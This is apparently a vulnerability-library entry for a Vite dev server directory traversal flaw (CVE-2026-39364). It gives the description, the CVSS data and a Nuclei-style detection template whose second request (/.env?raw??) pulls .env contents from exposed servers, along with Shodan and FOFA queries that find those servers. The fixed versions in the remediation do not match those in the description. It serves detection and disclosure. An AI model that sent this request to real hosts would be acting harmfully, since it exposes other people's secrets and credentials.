/Vulnerability Library

Vite Dev Server - Directory Traversal

CVE-2026-39364
Verified

Description

Vite is a modern frontend build tool. In Vite prior to versions 6.4.3, 6.3.4, and 5.4.23, a directory traversal vulnerability affects the Vite development server. When the Vite dev server is launched with the --host or server.host option, an unauthenticated attacker can craft a request with a path containing dot segments (e.g., /.vite/../<filename>) to bypass static file restrictions and access arbitrary files on the filesystem under the project root. The vulnerability allows access to files normally denied by Vite’s "server.fs.deny" setting, including sensitive files like .env, configuration files, or credentials in the project root. This issue has been fixed in versions 6.4.3, 6.3.4, and 5.4.23.

Severity

High

CVSS Score

7.5

Exploit Probability

7%

Published Date

April 9, 2026

Template Author

ritikchaddha

CVE-2026-39364.yaml
id: CVE-2026-39364

info:
  name: Vite Dev Server - Directory Traversal
  author: ritikchaddha
  severity: high
  description: |
    Vite is a modern frontend build tool. In Vite prior to versions 6.4.3, 6.3.4, and 5.4.23, a directory traversal vulnerability affects the Vite development server. When the Vite dev server is launched with the --host or server.host option, an unauthenticated attacker can craft a request with a path containing dot segments (e.g., /.vite/../<filename>) to bypass static file restrictions and access arbitrary files on the filesystem under the project root. The vulnerability allows access to files normally denied by Vite’s "server.fs.deny" setting, including sensitive files like .env, configuration files, or credentials in the project root. This issue has been fixed in versions 6.4.3, 6.3.4, and 5.4.23.
  impact: |
    Attackers can retrieve sensitive files like .env or certificates, leading to information disclosure.
  remediation: |
    Update to versions 7.3.2 or 8.0.5 or later.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-cw47-99h4-q43f
    - https://nvd.nist.gov/vuln/detail/CVE-2026-39364
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-39364
    cwe-id: CWE-22
    epss-score: 0.06829
    epss-percentile: 0.91445
  metadata:
    max-request: 2
    fofa-query: body="/@vite/client"
    shodan-query: http.html:"/@vite/client"
  tags: cve,cve2025,vite,exposure,bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/.env"

    matchers:
      - type: status
        status:
          - 403
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/.env?raw??"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "export default", "data:application/json;base64")'
          - 'contains_any(content_type, "text/javascript", "application/javascript")'
          - '!contains(tolower(body), "<html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100cfe08dd7a24421fc3d699dc7ce6a82f9393d8d7504fa274e44a10307b74b3669022100a745abec3fa06f2911ee8fafd89148e27cb849e864edd69b848d4e3865eccb1e:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-39364
CWE ID:
cwe-22

References

https://github.com/vitejs/vite/security/advisories/GHSA-cw47-99h4-q43fhttps://nvd.nist.gov/vuln/detail/CVE-2026-39364

Remediation Steps

Update to versions 7.3.2 or 8.0.5 or later.